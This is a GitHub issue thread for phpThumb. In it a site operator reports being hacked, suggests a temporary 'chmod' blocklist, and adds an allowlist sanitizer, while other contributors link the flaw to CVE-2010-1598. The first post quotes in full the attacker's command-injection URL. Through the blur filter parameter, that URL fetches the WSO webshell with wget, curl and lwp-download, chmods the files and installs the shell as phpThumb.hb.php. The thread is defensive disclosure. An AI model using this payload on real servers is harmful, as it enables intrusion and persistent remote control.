
Vulnerability and Successfully Hacked #109

Open
ChrisWesterfield opened this issue Mar 5, 2018 · 3 comments

ChrisWesterfield commented Mar 5, 2018

Hi,

We were hacked today through the thumbnailer.
I just wanted to share details on this one and give feedback on how we blocked this stuff out of our system.

I'm not 100% sure whether this applies to the current version, but you can try it with the full URL that we were attacked with:

The Attacker used this URL:

phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20chmod%20777%20*%20.%20-R%20;%20wget%20https://raw.githubusercontent.com/tennc/webshell/master/xakep-shells/PHP/wso.txt%20;%20curl%20-O%20https://raw.githubusercontent.com/tennc/webshell/master/xakep-shells/PHP/wso.txt%20;%20lwp-download%20https://raw.githubusercontent.com/tennc/webshell/master/xakep-shells/PHP/wso.txt%20;%20mv%20wso.txt%20phpThumb.hb.php%20;%20chmod%20555%20.%20phpThumb.hb.php%20;%20ls%20-al%20;%20&phpThumbDebug=9

As you can see, he injected console calls into the blur filter.
This code was executed and always created a phpThumb.hb.php.

We blocked this attack temporarily by adding this as the first line after `<?php`:

```php
// Temporary blocklist: reject the request if any GET value (including the
// entries of array parameters such as fltr[]) contains "chmod" after decoding.
foreach ($_GET as $id => $value) {
    if (is_array($value)) {
        foreach ($value as $subValue) {
            $subValue = urldecode($subValue);
            if (strpos($subValue, 'chmod') !== false) {
                die('file not found!');
            }
        }
    } else {
        // Check the decoded value, not the raw one.
        $subValue = urldecode($value);
        if (strpos($subValue, 'chmod') !== false) {
            die('file not found!');
        }
    }
}
```

This is only a temporary fix for us, as we will move routines into our WAF to protect us from these sneaky attacks.

We just wanted to share this with the community as a first quick fix.
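An allowlist alternative to a keyword blocklist, as an added example that is not part of this issue or of phpThumb itself: each `fltr[]` value must name an expected filter and its `|`-separated arguments may only contain characters that cannot act as shell metacharacters. The filter names in `ALLOWED_FILTERS` are an assumption to adjust to the filters your site uses (`blur` is the one from the attack URL above).

```php
<?php
// Added example (not phpThumb's own code): allowlist validation of fltr[] values.
// phpThumb filter syntax is "name|arg1|arg2|...". Rather than searching values for
// known-bad words such as "chmod", accept only expected filter names and argument
// characters that can never reach a shell (no spaces, ";", "&", "$", quotes, "`", "/").

// ASSUMPTION: adjust this list to the filters your site really uses.
const ALLOWED_FILTERS = ['blur', 'gray', 'sep', 'rot', 'bord', 'usm'];

/** Returns the cleaned "name|args" string, or null if the value must be rejected. */
function sanitize_filter(string $value): ?string
{
    // $_GET is already URL-decoded by PHP. Decoding a second time would expose
    // characters that this check never saw, so the value is used as-is.
    $parts = explode('|', $value);
    $name = array_shift($parts);
    if (!in_array($name, ALLOWED_FILTERS, true)) {
        return null;
    }
    foreach ($parts as $arg) {
        // Numbers, colours (#RRGGBB), simple words, commas for coordinate lists.
        if (!preg_match('/\A[A-Za-z0-9#.,_-]{0,64}\z/', $arg)) {
            return null;
        }
    }
    return implode('|', array_merge([$name], $parts));
}

/** Validates a whole fltr[] array; rejected entries are dropped and logged. */
function sanitize_filter_list(array $filters): array
{
    $clean = [];
    foreach ($filters as $f) {
        $ok = is_string($f) ? sanitize_filter($f) : null;
        if ($ok === null) {
            $shown = is_string($f) ? substr($f, 0, 200) : gettype($f);
            error_log('phpThumb: rejected fltr value ' . var_export($shown, true));
            continue;
        }
        $clean[] = $ok;
    }
    return $clean;
}

// Run before phpThumb reads $_GET['fltr'].
if (isset($_GET['fltr'])) {
    $_GET['fltr'] = sanitize_filter_list((array) $_GET['fltr']);
}
```

With this in place a legitimate `fltr[]=blur|9` passes unchanged, while the attack value above is dropped because its arguments contain spaces and semicolons, and the rejection is logged for detection.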

ggppdk (Contributor) commented Mar 5, 2018

This sounds exactly like the 2010 security issue of phpThumb 1.7.9

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1598
http://stopmalvertising.com/security/phpthumb-fltr-command-injection-vulnerability-exploit-scans.html

Which version are you running?

@Georgi-Todorov

The URL parameters are very useful and I LOVE all the functionality of phpThumb, but the way the parameters were structured and designed is really poor. Special characters usable for command injection are accepted, which they shouldn't have been.
There's no effective, quick way of cleaning the passed URL parameters without breaking the phpThumb functionality.
What you can do instead is rename phpThumb.php and move it outside of the phpThumb directory.
Add a server config rewrite rule and set a new rule with your custom parameters for every function you need.
E.g.: https://domain.tld/phpthumb/loadImage.php?zc=1&w=75&h=25src=http://image.com/png.jpg
becomes
https://domain.tld/zoomed/75/25/png.jpg
or anything along those lines that you like.

@arturmamedov (Contributor)

So?
